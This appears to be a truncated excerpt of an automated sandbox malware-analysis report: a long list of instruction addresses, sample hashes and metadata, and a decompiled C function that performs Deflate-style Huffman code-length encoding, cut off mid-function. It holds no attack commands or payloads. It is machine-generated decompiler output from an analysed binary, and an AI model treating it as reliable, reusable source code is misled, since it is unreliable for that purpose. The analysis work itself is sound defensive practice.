                  0x00405685
                  0x00405688
                  0x004056ba
                  0x004056ba
                  0x004056bd
                  0x004056c4
                  0x004056cc
                  0x004056cf
                  0x004056d1
                  0x00405779
                  0x0040577c
                  0x00405781
                  0x00405782
                  0x0040578b
                  0x0040578d
                  0x0040578e
                  0x00405796
                  0x00405796
                  0x0040579a
                  0x0040579d
                  0x004057a0
                  0x004057a0
                  0x004057a3
                  0x004057a6
                  0x004057a6
                  0x004057a9
                  0x004057ab
                  0x004057b2
                  0x004057b9
                  0x004057bc
                  0x004057bf
                  0x004057c1
                  0x004057fa
                  0x004057fd
                  0x00405800
                  0x00405803
                  0x00405805
                  0x00405811
                  0x00405811
                  0x00405819
                  0x0040581c
                  0x00405821
                  0x00405825
                  0x00405828
                  0x0040582b
                  0x00405869
                  0x0040586c
                  0x0040586f
                  0x004058d2
                  0x004058d2
                  0x004058d5
                  0x004058d5
                  0x004058d7
                  0x004058da
                  0x004058df
                  0x004058e5
                  0x004058e8
                  0x004058ee
                  0x004058f1
                  0x004058f4
                  0x004058f4
                  0x004058f9
                  0x004058fc
                  0x004058fe
                  0x00000000
                  0x00000000
                  0x00405906
                  0x00405908
                  0x0040590b
                  0x0040590e
                  0x004058c8
                  0x004058ca
                  0x00000000
                  0x004058ca
                  0x004058bf
                  0x004058c2
                  0x004058c5
                  0x00000000
                  0x004058c5
                  0x00405871
                  0x00405874
                  0x00000000
                  0x00000000
                  0x00405876
                  0x0040587e
                  0x0040587e
                  0x00405880
                  0x00405882
                  0x00405884
                  0x00405887
                  0x0040588a
                  0x0040588d
                  0x00405890
                  0x00405890
                  0x00405897
                  0x0040589a
                  0x0040589d
                  0x004058a0
                  0x004058a3
                  0x004058a6
                  0x00000000
                  0x00000000
                  0x004058a8
                  0x004058aa
                  0x00000000
                  0x00000000
                  0x004058b0
                  0x004058b5
                  0x004058b7
                  0x004058ba
                  0x004058bd
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004058bd
                  0x0040582d
                  0x00405830
                  0x00405830
                  0x00405832
                  0x00405833
                  0x00405836
                  0x00405838
                  0x00000000
                  0x00000000
                  0x0040583e
                  0x00405841
                  0x00405844
                  0x00405b30
                  0x00405b31
                  0x00405b34
                  0x00000000
                  0x00405b34
                  0x0040585c
                  0x0040585f
                  0x00405862
                  0x00405864
                  0x00000000
                  0x00405864
                  0x00405807
                  0x0040580b
                  0x00405b20
                  0x00405b20
                  0x00405b23
                  0x00000000
                  0x00405b23
                  0x00000000
                  0x0040580b
                  0x004057e2
                  0x004057e2
                  0x004057e4
                  0x004057c5
                  0x004057c5
                  0x004057c8
                  0x00405b15
                  0x00000000
                  0x00405b15
                  0x004057d3
                  0x004057d5
                  0x004057d6
                  0x004057d9
                  0x004057d9
                  0x004057dc
                  0x004057df
                  0x00000000
                  0x004057df
                  0x004057e9
                  0x004057f1
                  0x004057f4
                  0x004057f4
                  0x004057f4
                  0x004057f7
                  0x00000000
                  0x004057f7
                  0x004056d9
                  0x004056dc
                  0x00000000
                  0x004056dc
                  0x0040568f
                  0x00405692
                  0x0040574b
                  0x00405763
                  0x00405768
                  0x0040576b
                  0x0040576e
                  0x00405771
                  0x00000000
                  0x00405771
                  0x00405698
                  0x004056a0
                  0x004056a8
                  0x004056ab
                  0x004056ad
                  0x004056e6
                  0x004056e9
                  0x0040571e
                  0x0040571e
                  0x00405721
                  0x00405b0a
                  0x00000000
                  0x00405b0a
                  0x0040572c
                  0x0040572e
                  0x00405732
                  0x00405735
                  0x00405737
                  0x0040573a
                  0x0040573d
                  0x00405740
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405746
                  0x004056ed
                  0x004056ee
                  0x004056f1
                  0x00405700
                  0x0040570b
                  0x0040570c
                  0x0040570f
                  0x00405712
                  0x00405714
                  0x00000000
                  0x00000000
                  0x00405716
                  0x0040571a
                  0x0040571c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040571c
                  0x00000000
                  0x004056f1
                  0x004056af
                  0x004056b2
                  0x004056b4
                  0x00000000
                  0x00000000
                  0x004056b6
                  0x004056b8
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004056b8
                  0x00405670
                  0x00405670
                  0x00405672
                  0x00405653
                  0x00405653
                  0x00405656
                  0x00405aff
                  0x00000000
                  0x00405aff
                  0x00405661
                  0x00405663
                  0x00405664
                  0x00405667
                  0x00405667
                  0x0040566a
                  0x0040566d
                  0x00000000
                  0x0040566d
                  0x00405677
                  0x0040567f
                  0x00405682
                  0x00405682
                  0x00405682
                  0x00000000
                  0x00405682
                  0x00405607
                  0x00405607
                  0x0040560a
                  0x0040560d
                  0x00405af0
                  0x00405af1
                  0x00405af4
                  0x00000000
                  0x00405af4
                  0x00405613
                  0x00405615
                  0x00405615
                  0x00405616
                  0x00405616
                  0x00000000
                  0x00405616
                  0x00405532
                  0x00405535
                  0x0040553a
                  0x00000000
                  0x0040553a
                  0x004054e8
                  0x004054eb
                  0x004055bf
                  0x004055c4
                  0x004055c7
                  0x004055ca
                  0x004055cd
                  0x00000000
                  0x004055cd
                  0x004054f1
                  0x004054f9
                  0x00405501
                  0x00405504
                  0x00405506
                  0x00405542
                  0x00405545
                  0x0040557a
                  0x0040557a
                  0x0040557d
                  0x00405ae3
                  0x00000000
                  0x00405ae3
                  0x00405588
                  0x0040558a
                  0x0040558e
                  0x00405591
                  0x00405593
                  0x00405596
                  0x00405599
                  0x0040559c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004055a2
                  0x00405549
                  0x0040554a
                  0x0040554d
                  0x0040555c
                  0x00405567
                  0x00405568
                  0x0040556b
                  0x0040556e
                  0x00405570
                  0x00000000
                  0x00000000
                  0x00405572
                  0x00405576
                  0x00405578
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405578
                  0x00000000
                  0x0040554d
                  0x00405508
                  0x0040550b
                  0x0040550d
                  0x00000000
                  0x00000000
                  0x0040550f
                  0x00405511
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405511
                  0x004053bc
                  0x004053bd
                  0x004053c0
                  0x00000000
                  0x00000000
                  0x004053c6
                  0x004053c9
                  0x004053f4
                  0x004053cb
                  0x004053e1
                  0x004053e6
                  0x004053e9
                  0x004053ec
                  0x004053ef
                  0x004053ef
                  0x004053fc
                  0x00405404
                  0x00405407
                  0x00405409
                  0x00405414
                  0x00405415
                  0x00405418
                  0x00405420
                  0x00405423
                  0x00405424
                  0x0040542c
                  0x0040542f
                  0x0040542f
                  0x00000000
                  0x0040540b
                  0x0040540d
                  0x00405433
                  0x00405433
                  0x00405436
                  0x00405438
                  0x0040543d
                  0x00000000
                  0x00000000
                  0x00405443
                  0x00405446
                  0x00405471
                  0x00405448
                  0x0040545e
                  0x00405463
                  0x00405466
                  0x00405469
                  0x0040546c
                  0x0040546c
                  0x00405479
                  0x00405481
                  0x00405484
                  0x00405486
                  0x00405491
                  0x00405492
                  0x00405495
                  0x004054a2
                  0x004054a7
                  0x004054a8
                  0x004054ab
                  0x004054b3
                  0x004054b6
                  0x004054b6
                  0x00000000
                  0x00405488
                  0x0040548a
                  0x004054ba
                  0x004054bd
                  0x004054bf
                  0x004054c7
                  0x004054c9
                  0x004054ca
                  0x004054cf
                  0x0040561e
                  0x0040561e
                  0x0040561e
                  0x00000000
                  0x0040561e
                  0x004054d5
                  0x004054d8
                  0x004054db
                  0x00000000
                  0x004054db
                  0x00405486
                  0x00405409
                  0x00404f75
                  0x00404f7f
                  0x00404f95
                  0x00404fab
                  0x00404fb1
                  0x00404fb4
                  0x00404fb6
                  0x00404fb9
                  0x00404fbd
                  0x00404fd7
                  0x00404fd7
                  0x00404fdb
                  0x00404fdd
                  0x00404fe3
                  0x00404fe3
                  0x00404fe3
                  0x00404feb
                  0x00404fec
                  0x00404fec
                  0x00404ff5
                  0x00404ff8
                  0x00404ffa
                  0x00405001
                  0x00405004
                  0x00405004
                  0x00405009
                  0x0040500f
                  0x0040501d
                  0x0040501d
                  0x00405020
                  0x00405024
                  0x00405027
                  0x0040502c
                  0x0040516a
                  0x0040516a
                  0x0040516e
                  0x0040539b
                  0x0040539b
                  0x00000000
                  0x0040539b
                  0x00405174
                  0x00405174
                  0x00405176
                  0x0040517c
                  0x0040517f
                  0x00405181
                  0x00405361
                  0x00405363
                  0x00405ad2
                  0x00405ad5
                  0x00405ad5
                  0x00405ad8
                  0x00000000
                  0x00405ad8
                  0x00405377
                  0x00405388
                  0x00405388
                  0x00405392
                  0x00405398
                  0x00000000
                  0x00405398
                  0x00405187
                  0x0040518a
                  0x0040518d
                  0x004051bf
                  0x004051bf
                  0x004051c2
                  0x004051c9
                  0x004051d1
                  0x004051d4
                  0x004051d6
                  0x00405283
                  0x00405284
                  0x00405287
                  0x0040528f
                  0x00405292
                  0x00405293
                  0x0040529b
                  0x0040529e
                  0x0040529e
                  0x004052a2
                  0x004052a5
                  0x004052a7
                  0x004052a9
                  0x004052ac
                  0x004052af
                  0x004052b2
                  0x004052b5
                  0x004052ca
                  0x004052d6
                  0x004052d6
                  0x004052dd
                  0x004052e0
                  0x004052e2
                  0x00405308
                  0x0040530b
                  0x00405310
                  0x00405317
                  0x0040531a
                  0x0040531d
                  0x00405324
                  0x00405326
                  0x00405329
                  0x0040532c
                  0x0040532f
                  0x0040533b
                  0x0040533b
                  0x00405331
                  0x00405331
                  0x00405331
                  0x00405347
                  0x00405350
                  0x00405353
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004052e4
                  0x004052e4
                  0x004052e4
                  0x004052e7
                  0x00000000
                  0x00000000
                  0x004052f2
                  0x004052f4
                  0x004052f5
                  0x004052f8
                  0x004052fb
                  0x004052fe
                  0x00405301
                  0x00405303
                  0x00000000
                  0x00000000
                  0x00405305
                  0x00000000
                  0x00405305
                  0x00405ac7
                  0x00000000
                  0x00405ac7
                  0x004052cc
                  0x004052d0
                  0x00405ab9
                  0x00405ab9
                  0x00405abc
                  0x00000000
                  0x00405abc
                  0x00000000
                  0x004052d0
                  0x004052b7
                  0x004052bd
                  0x004052c4
                  0x00000000
                  0x004052c4
                  0x004051de
                  0x004051e6
                  0x00000000
                  0x004051e6
                  0x00405194
                  0x00405197
                  0x0040526b
                  0x00405270
                  0x00405273
                  0x00405276
                  0x00405279
                  0x00000000
                  0x00405279
                  0x0040519d
                  0x004051a5
                  0x004051ad
                  0x004051b0
                  0x004051b2
                  0x004051ee
                  0x004051f1
                  0x00405226
                  0x00405226
                  0x00405229
                  0x00405aae
                  0x00000000
                  0x00405aae
                  0x00405234
                  0x00405236
                  0x0040523a
                  0x0040523d
                  0x0040523f
                  0x00405242
                  0x00405245
                  0x00405248
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040524e
                  0x004051f5
                  0x004051f6
                  0x004051f9
                  0x00405208
                  0x00405213
                  0x00405214
                  0x00405217
                  0x0040521a
                  0x0040521c
                  0x00000000
                  0x00000000
                  0x0040521e
                  0x00405222
                  0x00405224
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405224
                  0x00000000
                  0x004051f9
                  0x004051b4
                  0x004051b7
                  0x004051b9
                  0x00000000
                  0x00000000
                  0x004051bb
                  0x004051bd
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004051bd
                  0x00405032
                  0x00405035
                  0x00405038
                  0x0040503a
                  0x0040503e
                  0x00405041
                  0x00405043
                  0x00000000
                  0x00000000
                  0x00405049
                  0x00405050
                  0x00405056
                  0x0040505d
                  0x00405067
                  0x00405069
                  0x0040506b
                  0x0040506c
                  0x0040506f
                  0x0040506f
                  0x00405073
                  0x00405076
                  0x00405079
                  0x004050c6
                  0x004050cb
                  0x004050d3
                  0x004050d6
                  0x004050d8
                  0x004050dd
                  0x004050e0
                  0x004050e3
                  0x004050eb
                  0x004050eb
                  0x004050ee
                  0x004050f1
                  0x004050f1
                  0x004050f4
                  0x004050f7
                  0x004050fa
                  0x00405143
                  0x0040514b
                  0x0040514b
                  0x0040514e
                  0x00000000
                  0x004050fc
                  0x004050fc
                  0x004050ff
                  0x004050ff
                  0x00405102
                  0x00405105
                  0x00405105
                  0x00405112
                  0x00405117
                  0x0040511b
                  0x0040511e
                  0x00405137
                  0x00405120
                  0x00405123
                  0x00405126
                  0x0040512c
                  0x00405132
                  0x00405132
                  0x0040513a
                  0x0040513a
                  0x0040513a
                  0x0040513d
                  0x00405140
                  0x00000000
                  0x00405140
                  0x004050fa
                  0x00405085
                  0x00405088
                  0x0040508e
                  0x00000000
                  0x00000000
                  0x0040509a
                  0x0040509d
                  0x004050a2
                  0x004050a2
                  0x004050a7
                  0x004050aa
                  0x004050aa
                  0x004050ad
                  0x004050af
                  0x004050b1
                  0x004050b1
                  0x004050b9
                  0x00405156
                  0x00405156
                  0x00405159
                  0x0040515a
                  0x0040515a
                  0x00405164
                  0x00405167
                  0x00405167
                  0x00000000
                  0x00405167
                  0x00405014
                  0x00405017
                  0x00405a9d
                  0x00405aa0
                  0x00405aa0
                  0x00405aa3
                  0x00000000
                  0x00405aa3
                  0x00000000
                  0x00405017
                  0x00404fbf
                  0x00404fc2
                  0x00404fc6
                  0x00404fcd
                  0x00404fce
                  0x00404fce
                  0x00404fd4
                  0x00404fd4
                  0x00000000
                  0x00404fd4
                  0x00404e9e
                  0x00404ea1
                  0x00404ecb
                  0x00404ecb
                  0x00404ed4
                  0x00404ed7
                  0x00404eda
                  0x00404edd
                  0x00404ee0
                  0x00404ee3
                  0x00404eed
                  0x00000000
                  0x00404eed
                  0x00404ea3
                  0x00404ea6
                  0x00404ea6
                  0x00404ea6
                  0x00404ea9
                  0x00000000
                  0x00000000
                  0x00404eb4
                  0x00404eb6
                  0x00404eb7
                  0x00404eba
                  0x00404ebd
                  0x00404ec0
                  0x00404ec3
                  0x00000000
                  0x00000000
                  0x00404ec5
                  0x00404ec8
                  0x00000000
                  0x00404ec8
                  0x00405a92
                  0x00000000
                  0x00405a92
                  0x00404e06
                  0x00404e08
                  0x00404e0b
                  0x00404e14
                  0x00404e1e
                  0x00404e24
                  0x00404e2b
                  0x00404e32
                  0x00404e37
                  0x00404e49
                  0x00404e4a
                  0x00404e4a
                  0x00404e4c
                  0x00404e54
                  0x00404e5a
                  0x00404e60
                  0x00000000
                  0x00404e60
                  0x00404d1e
                  0x00404d1e
                  0x00404d1f
                  0x00000000
                  0x00000000
                  0x00404d26
                  0x00404d26
                  0x00404d27
                  0x00405c30
                  0x00000000
                  0x00405c30
                  0x00404d2d
                  0x00404d2d
                  0x00404d2e
                  0x00405c63
                  0x00000000
                  0x00405c63
                  0x00404d34
                  0x00404d34
                  0x00404d37
                  0x00000000
                  0x00000000
                  0x00404d3d
                  0x00404d3d
                  0x00404d3e
                  0x00405a3f
                  0x00000000
                  0x00405a3f
                  0x00404d44
                  0x00404d45
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00404d4b
                  0x00404ccf
                  0x00000000
                  0x00000000
                  0x00404cd5
                  0x00404cd5
                  0x00404cd8
                  0x00000000
                  0x00000000
                  0x00404cde
                  0x00404cde
                  0x00404cdf
                  0x00000000
                  0x00000000
                  0x00404ce5
                  0x00404ce5
                  0x00404ce6
                  0x00000000
                  0x00000000
                  0x00404cec
                  0x00404cec
                  0x00404cef
                  0x00000000
                  0x00000000
                  0x00404cf6
                  0x00404cf6
                  0x00404cf7
                  0x00000000
                  0x00000000
                  0x00404cfd
                  0x00404cfd
                  0x00404cfe
                  0x00000000
                  0x00000000
                  0x00404d04
                  0x00404d05
                  0x00000000
                  0x00000000
                  0x00404d0b
                  0x00404d0b
                  0x00404d0e
                  0x00000000
                  0x00404d0e
                  0x00404b80
                  0x00405604
                  0x00000000
                  0x00405604
                  0x00404b86
                  0x00404b89
                  0x00404c8c
                  0x00404c8c
                  0x00404c8f
                  0x00000000
                  0x00000000
                  0x00404c95
                  0x00404c95
                  0x00404c98
                  0x00000000
                  0x00000000
                  0x00404c9f
                  0x00404c9f
                  0x00404ca0
                  0x00000000
                  0x00000000
                  0x00404ca6
                  0x00404ca6
                  0x00404ca7
                  0x00000000
                  0x00000000
                  0x00404cad
                  0x00404cad
                  0x00404cae
                  0x00000000
                  0x00000000
                  0x00404cb4
                  0x00404cb4
                  0x00404cb7
                  0x00000000
                  0x00000000
                  0x00404cbe
                  0x00404cbf
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00404cc5
                  0x00404b8f
                  0x00000000
                  0x00000000
                  0x00404b98
                  0x00000000
                  0x00000000
                  0x00404b9e
                  0x00000000
                  0x00404ba5
                  0x00404ba8
                  0x00404baa
                  0x00404bad
                  0x00404baf
                  0x00404bb2
                  0x00404bb5
                  0x00404bb8
                  0x00404bbb
                  0x00404bbe
                  0x00404bc1
                  0x00404bc4
                  0x00404bca
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00404bd0
                  0x00404bd0
                  0x00404bd3
                  0x00404bd7
                  0x00404be6
                  0x00404be7
                  0x00000000
                  0x00404be7
                  0x00404bd9
                  0x00404bdc
                  0x00000000
                  0x00000000
                  0x00404bec
                  0x00404bef
                  0x00404bef
                  0x00404bf1
                  0x00404c0a
                  0x00404c0e
                  0x00404c11
                  0x00404c14
                  0x00404c1c
                  0x00404c1f
                  0x00404c24
                  0x00404c2e
                  0x00404c30
                  0x00404c47
                  0x00404c47
                  0x00404c4a
                  0x00404c4c
                  0x00404c4c
                  0x00404c50
                  0x00404c53
                  0x00404c7c
                  0x00404c7c
                  0x00404c7f
                  0x00404c81
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00404c87
                  0x00404c5b
                  0x00404c5d
                  0x00404c63
                  0x00404c74
                  0x00404c74
                  0x00404c77
                  0x00404c77
                  0x00404c77
                  0x00404c79
                  0x00000000
                  0x00404c79
                  0x00404c69
                  0x00404c6b
                  0x00404c6c
                  0x00404c6e
                  0x00000000
                  0x00000000
                  0x00404c70
                  0x00000000
                  0x00404c70
                  0x00404c32
                  0x00404c36
                  0x00000000
                  0x00000000
                  0x00404c3c
                  0x00404c3e
                  0x00000000
                  0x00000000
                  0x00404c40
                  0x00404c43
                  0x00000000
                  0x00404c43
                  0x00404bf3
                  0x00404bf5
                  0x00404bf6
                  0x00404bf9
                  0x00404bfb
                  0x00404bfc
                  0x00404c00
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405a5d
                  0x00000000
                  0x00000000
                  0x00404b9e

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: memset$_memset
                  • String ID: $0HCw
                  • API String ID: 805054810-431550929
                  • Opcode ID: 381c95585b6278ef5375f448f3179df0e1c7a5d05708aec7cc4d4f43877259da
                  • Instruction ID: 0f27d5521e96fbc1980188426f25ed571c9babf91149ddb257576a03cfef0b11
                  • Opcode Fuzzy Hash: 381c95585b6278ef5375f448f3179df0e1c7a5d05708aec7cc4d4f43877259da
                  • Instruction Fuzzy Hash: 59D25D71E0461ADBDB18CFA9C9906AEBBB1FF49300F14416AD955F7380D738AA41CF98
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00402F82, Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 416UNIQUECrypto
                  Download Yara Rule
                  C-Code - Quality: 88%
                  			E00402F82(void* __ecx) {
				int _v8;
				int _v12;
				signed int _v16;
				signed char _v20;
				signed char _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				char _v356;
				void _v676;
				int _t269;
				signed char _t283;
				signed char _t287;
				signed char _t291;
				signed int _t294;
				signed char _t297;
				signed int _t298;
				signed char _t301;
				signed char _t310;
				int _t336;
				int _t337;
				signed char _t341;
				signed char _t342;
				signed char _t343;
				void* _t344;
				void* _t345;
				signed char _t346;
				signed char _t347;
				signed char _t348;
				signed char* _t349;
				signed char* _t350;
				signed char _t351;
				signed char* _t352;
				signed char* _t353;
				signed char* _t354;
				signed char* _t355;
				signed char* _t356;
				intOrPtr _t358;
				intOrPtr _t360;
				char _t361;
				intOrPtr _t362;
				char _t364;
				intOrPtr _t366;
				intOrPtr _t368;
				void* _t374;
				void* _t375;
				signed int _t377;
				signed char _t379;
				int _t381;
				void* _t383;
				signed int _t385;
				void* _t387;
				void* _t388;
				signed int _t389;
				void* _t390;
				void* _t391;
				void* _t392;
				void* _t393;

				_v20 = 0xff;
				_t383 = __ecx;
				 *((short*)(__ecx + 0x8392)) = 1;
				E00402D85(__ecx, 0, 0x120, 0xf, 0);
				E00402D85(__ecx, 1, 0x20, 0xf, 0);
				_t392 = _t391 + 0x18;
				_t336 = 0x11e;
				while( *((char*)(_t383 + _t336 + 0x8f11)) == 0) {
					_t336 = _t336 - 1;
					if(_t336 > 0x101) {
						continue;
					}
					break;
				}
				_v16 = _t336;
				_t269 = 0x1e;
				while( *((char*)(_t383 + _t269 + 0x9031)) == 0) {
					_t269 = _t269 - 1;
					if(_t269 > 1) {
						continue;
					}
					break;
				}
				_v32 = _t269;
				memcpy( &_v676, _t383 + 0x8f12, _t336);
				memcpy( &_v676 + _t336, _t383 + 0x9032, _v32);
				_t337 = 0;
				_v36 = _v32 + _t336;
				_v12 = 0;
				_v8 = 0;
				memset(_t383 + 0x8612, 0, 0x26);
				_t393 = _t392 + 0x24;
				_v28 = 0;
				if(_v36 > 0) {
					_t310 = _v20;
					do {
						_t379 =  *((intOrPtr*)(_t390 + _v28 - 0x2a0));
						_v24 = _t379;
						if(_t379 != 0) {
							_t358 = _v12;
							if(_t358 != 0) {
								if(_t358 >= 3) {
									if(_t358 > 0xa) {
										 *((short*)(_t383 + 0x8636)) =  *((short*)(_t383 + 0x8636)) + 1;
										_t364 = _t358 - 0xb;
										 *(_t390 + _t337 - 0x160) = 0x12;
									} else {
										 *((short*)(_t383 + 0x8634)) =  *((short*)(_t383 + 0x8634)) + 1;
										_t364 = _t358 - 3;
										 *(_t390 + _t337 - 0x160) = 0x11;
									}
									 *((char*)(_t390 + _t337 - 0x15f)) = _t364;
									_t337 = _t337 + 2;
								} else {
									 *(_t383 + 0x8612) =  *(_t383 + 0x8612) + _t358;
									E0040FDD0( &_v356 + _t337, 0, _t358);
									_t393 = _t393 + 0xc;
									_t379 = _v24;
									_t337 = _t337 + _v12;
								}
								_t310 = _v20;
								_v12 = 0;
							}
							if(_t379 == _t310) {
								_t381 = _v8 + 1;
								_v8 = _t381;
								if(_t381 == 6) {
									 *((short*)(_t383 + 0x8632)) =  *((short*)(_t383 + 0x8632)) + 1;
									_t381 = 0;
									 *(_t390 + _t337 - 0x160) = 0x310;
									_v8 = 0;
									goto L33;
								}
							} else {
								_t362 = _v8;
								if(_t362 != 0) {
									if(_t362 >= 3) {
										 *((short*)(_t383 + 0x8632)) =  *((short*)(_t383 + 0x8632)) + 1;
										 *(_t390 + _t337 - 0x160) = 0x10;
										 *((char*)(_t390 + _t337 - 0x15f)) = _t362 - 3;
										_t337 = _t337 + 2;
									} else {
										 *((intOrPtr*)(_t383 + 0x8612 + (_t310 & 0x000000ff) * 2)) =  *((intOrPtr*)(_t383 + 0x8612 + (_t310 & 0x000000ff) * 2)) + _t362;
										E0040FDD0( &_v356 + _t337, _v20, _t362);
										_t379 = _v24;
										_t393 = _t393 + 0xc;
										_t337 = _t337 + _v8;
									}
									_v8 = 0;
								}
								 *(_t390 + _t337 - 0x160) = _t379;
								_t381 = _v8;
								 *((short*)(_t383 + 0x8612 + (_t379 & 0x000000ff) * 2)) =  *((short*)(_t383 + 0x8612 + (_t379 & 0x000000ff) * 2)) + 1;
								_t337 = _t337 + 1;
							}
						} else {
							_t366 = _v8;
							if(_t366 != 0) {
								if(_t366 >= 3) {
									 *((short*)(_t383 + 0x8632)) =  *((short*)(_t383 + 0x8632)) + 1;
									 *(_t390 + _t337 - 0x160) = 0x10;
									 *((char*)(_t390 + _t337 - 0x15f)) = _t366 - 3;
									_t337 = _t337 + 2;
								} else {
									 *((intOrPtr*)(_t383 + 0x8612 + (_t310 & 0x000000ff) * 2)) =  *((intOrPtr*)(_t383 + 0x8612 + (_t310 & 0x000000ff) * 2)) + _t366;
									E0040FDD0( &_v356 + _t337, _v20, _t366);
									_t393 = _t393 + 0xc;
									_t337 = _t337 + _v8;
								}
								_v8 = 0;
							}
							_t381 = _v8;
							_t368 = _v12 + 1;
							_v12 = _t368;
							if(_t368 == 0x8a) {
								 *((short*)(_t383 + 0x8636)) =  *((short*)(_t383 + 0x8636)) + 1;
								 *(_t390 + _t337 - 0x160) = 0x7f12;
								_v12 = 0;
								L33:
								_t337 = _t337 + 2;
							}
						}
						_v28 = _v28 + 1;
						_t310 = _v24;
						_t360 = _v12;
						_v20 = _t310;
					} while (_v28 < _v36);
					if(_t381 == 0) {
						if(_t360 != 0) {
							if(_t360 >= 3) {
								if(_t360 > 0xa) {
									 *((short*)(_t383 + 0x8636)) =  *((short*)(_t383 + 0x8636)) + 1;
									_t361 = _t360 - 0xb;
									 *(_t390 + _t337 - 0x160) = 0x12;
								} else {
									 *((short*)(_t383 + 0x8634)) =  *((short*)(_t383 + 0x8634)) + 1;
									_t361 = _t360 - 3;
									 *(_t390 + _t337 - 0x160) = 0x11;
								}
								 *((char*)(_t390 + _t337 - 0x15f)) = _t361;
								goto L46;
							} else {
								 *(_t383 + 0x8612) =  *(_t383 + 0x8612) + _t360;
								E0040FDD0( &_v356 + _t337, 0, _t360);
								_t393 = _t393 + 0xc;
								_t337 = _t337 + _v12;
							}
						}
					} else {
						if(_t381 >= 3) {
							 *((short*)(_t383 + 0x8632)) =  *((short*)(_t383 + 0x8632)) + 1;
							 *(_t390 + _t337 - 0x160) = 0x10;
							 *((char*)(_t390 + _t337 - 0x15f)) = _t381 - 3;
							L46:
							_t337 = _t337 + 2;
						} else {
							 *((intOrPtr*)(_t383 + 0x8612 + (_t310 & 0x000000ff) * 2)) =  *((intOrPtr*)(_t383 + 0x8612 + (_t310 & 0x000000ff) * 2)) + _t381;
							E0040FDD0( &_v356 + _t337, _v24, _t381);
							_t393 = _t393 + 0xc;
							_t337 = _t337 + _v8;
						}
					}
				}
				_push(0);
				_push(7);
				_push(0x13);
				_t385 = 2;
				E00402D85(_t383, _t385);
				_t341 =  *(_t383 + 0x44);
				 *(_t383 + 0x48) =  *(_t383 + 0x48) | _t385 << _t341;
				_t387 = 0xfffffff8;
				_t283 = _t341 + 2;
				_t374 = 8;
				 *(_t383 + 0x44) = _t283;
				if(_t283 >= _t374) {
					do {
						_t356 =  *(_t383 + 0x30);
						if(_t356 <  *((intOrPtr*)(_t383 + 0x34))) {
							 *_t356 =  *(_t383 + 0x48);
							 *(_t383 + 0x30) =  &(( *(_t383 + 0x30))[1]);
						}
						 *(_t383 + 0x48) =  *(_t383 + 0x48) >> 8;
						 *(_t383 + 0x44) =  *(_t383 + 0x44) + _t387;
					} while ( *(_t383 + 0x44) >= _t374);
				}
				_t342 =  *(_t383 + 0x44);
				 *(_t383 + 0x48) =  *(_t383 + 0x48) | _v16 + 0xfffffeff << _t342;
				_t287 = _t342 + 5;
				 *(_t383 + 0x44) = _t287;
				if(_t287 >= _t374) {
					do {
						_t355 =  *(_t383 + 0x30);
						if(_t355 <  *((intOrPtr*)(_t383 + 0x34))) {
							 *_t355 =  *(_t383 + 0x48);
							 *(_t383 + 0x30) =  &(( *(_t383 + 0x30))[1]);
						}
						 *(_t383 + 0x48) =  *(_t383 + 0x48) >> 8;
						 *(_t383 + 0x44) =  *(_t383 + 0x44) + _t387;
					} while ( *(_t383 + 0x44) >= _t374);
				}
				_t343 =  *(_t383 + 0x44);
				 *(_t383 + 0x48) =  *(_t383 + 0x48) | _v32 - 0x00000001 << _t343;
				_t291 = _t343 + 5;
				 *(_t383 + 0x44) = _t291;
				if(_t291 >= _t374) {
					do {
						_t354 =  *(_t383 + 0x30);
						if(_t354 <  *((intOrPtr*)(_t383 + 0x34))) {
							 *_t354 =  *(_t383 + 0x48);
							 *(_t383 + 0x30) =  &(( *(_t383 + 0x30))[1]);
						}
						 *(_t383 + 0x48) =  *(_t383 + 0x48) >> 8;
						 *(_t383 + 0x44) =  *(_t383 + 0x44) + _t387;
					} while ( *(_t383 + 0x44) >= _t374);
				}
				_t344 = 0x12;
				while(1) {
					_t186 = _t344 + 0x4111a0; // 0xf
					if( *((char*)(( *_t186 & 0x000000ff) + _t383 + 0x9152)) != 0) {
						break;
					}
					_t344 = _t344 - 1;
					if(_t344 >= 0) {
						continue;
					}
					break;
				}
				_t189 = _t344 + 1; // 0x12
				_t345 = 4;
				_t294 =  <  ? _t345 : _t189;
				_t346 =  *(_t383 + 0x44);
				_v16 = _t294;
				 *(_t383 + 0x48) =  *(_t383 + 0x48) | _t294 + 0xfffffffc << _t346;
				_t297 = _t346 + 4;
				 *(_t383 + 0x44) = _t297;
				if(_t297 >= _t374) {
					do {
						_t353 =  *(_t383 + 0x30);
						if(_t353 <  *((intOrPtr*)(_t383 + 0x34))) {
							_t297 =  *(_t383 + 0x48);
							 *_t353 = _t297;
							 *(_t383 + 0x30) =  &(( *(_t383 + 0x30))[1]);
						}
						 *(_t383 + 0x48) =  *(_t383 + 0x48) >> 8;
						 *(_t383 + 0x44) =  *(_t383 + 0x44) + _t387;
					} while ( *(_t383 + 0x44) >= _t374);
				}
				_t388 = 0;
				_t375 = 0;
				if(_v16 > 0) {
					_t389 = _v16;
					do {
						_t208 = _t375 + 0x4111a0; // 0x121110
						_t351 =  *(_t383 + 0x44);
